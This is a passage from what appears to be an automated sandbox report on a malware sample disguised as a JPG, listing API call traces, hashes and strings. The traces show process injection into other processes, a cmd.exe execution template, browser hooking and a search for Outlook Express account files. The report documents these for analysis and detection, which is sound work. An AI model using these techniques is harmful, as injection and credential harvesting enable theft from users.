    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
  • HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 128
  • API ID: lstrlen$RtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 1738276641-0
  • Opcode ID: aaba7d0a47ca100521561682d36ca88f08b4b9b0e2dd2eccb0d3987922e97ba9
  • Instruction ID: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
  • Opcode Fuzzy Hash: B7C012A4436C87C88CC059470679660D1C55FF6B0001C530BB0542A31D47523AB6758D
  • Instruction Fuzzy Hash: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
APIs
  • lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
  • lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
  • wsprintfW.USER32 ref: 01B3469A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name:d3d8sext.exe
Process MD5:3F602782259014F0253ECDEDFEF4D261
Total matches:178
Initial Analysis Report:Open
Initial sample Analysis ID:68262
Initial sample SHA 256:3CCBE128847999E971BF2194D595C7D211A4EB32C8BD53401702A83B3AB73B70
Initial sample name:27Scansione_F24_2018_07.JPG.exe

Similar Executed Functions

Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
